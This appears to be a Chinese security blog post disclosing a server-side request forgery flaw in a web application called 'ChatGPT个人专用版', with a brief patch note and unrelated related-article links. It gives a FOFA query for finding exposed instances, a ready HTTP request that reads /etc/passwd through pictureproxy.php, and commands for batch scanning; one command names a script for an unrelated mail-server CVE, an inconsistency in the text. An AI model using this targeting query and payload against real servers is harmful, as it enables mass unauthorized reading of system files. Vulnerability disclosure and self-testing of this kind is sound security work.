【0day】ChatGPT个人专用版 pictureproxy SSRF漏洞【附poc下载】

免责声明:本文仅用于技术学习和讨论。请勿使用本文所提供的内容及相关技术从事非法活动,若利用本文提供的内容或工具造成任何直接或间接的后果及损失,均由使用者本人负责,所产生的一切不良后果均与文章作者及本账号无关。

fofa语法

复制代码
title="ChatGPT个人专用版"

一、漏洞简述

ChatGPT个人专用版是一种基于人工智能的对话系统,旨在为用户提供个性化的交流体验。它能够理解和生成自然语言,帮助用户解决问题、获取信息或进行创意交流。通过不断学习和优化,ChatGPT个人专用版可以更好地适应用户的需求和偏好,提供更为精准和贴心的服务。其接口pictureproxy.php存在SSRF漏洞,攻击者可通过该漏洞获取系统敏感文件信息。

二、漏洞检测poc

复制代码
GET /pictureproxy.php?url=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close

三、漏洞检测脚本

安全测试人员可通过该脚本进行探测自身服务是否存在此漏洞:

POC下载:POC下载

批量检测:

python ChatGPT_pictureproxy_SSRF.py -f url.txt

单个url检测漏洞:

python RaidenMAILD_CVE-2024-32399_Path_Traversal.py -u url

四、修复

官方已更新补丁,请升级至最新版本。

相关推荐
Gappsong8741 小时前
【Linux学习】Linux安装并配置Redis
java·linux·运维·网络安全
Fortinet_CHINA2 小时前
工业网络安全新范式——从风险可见性到量化防御的进化
安全·web安全
Johny_Zhao4 小时前
Docker 一键安装部署 JumpServer 堡垒机
linux·网络安全·信息安全·云计算·shell·jumpserver·ldap·yum源·系统运维
网安小白的进阶之路4 小时前
A模块 系统与网络安全 第三门课 网络通信原理-3
网络·windows·安全·web安全·系统安全
HumanRisk4 小时前
HumanRisk-自动化安全意识与合规教育平台方案
网络·安全·web安全·网络安全意识教育
unable code5 小时前
攻防世界-Rerverse-game
网络安全·ctf·reverse
一只栖枝11 小时前
网络安全 vs 信息安全的本质解析:数据盾牌与网络防线的辩证关系关系
网络·网络安全·信息安全·it·信息安全认证
安全系统学习11 小时前
【网络安全】Mysql注入中锁机制
安全·web安全·网络安全·渗透测试·xss
怦然星动_14 小时前
DHCP中继及动态分配
网络安全
Johny_Zhao16 小时前
Ubuntu系统安装部署Pandawiki智能知识库
linux·mysql·网络安全·信息安全·云计算·shell·yum源·系统运维·itsm·pandawiki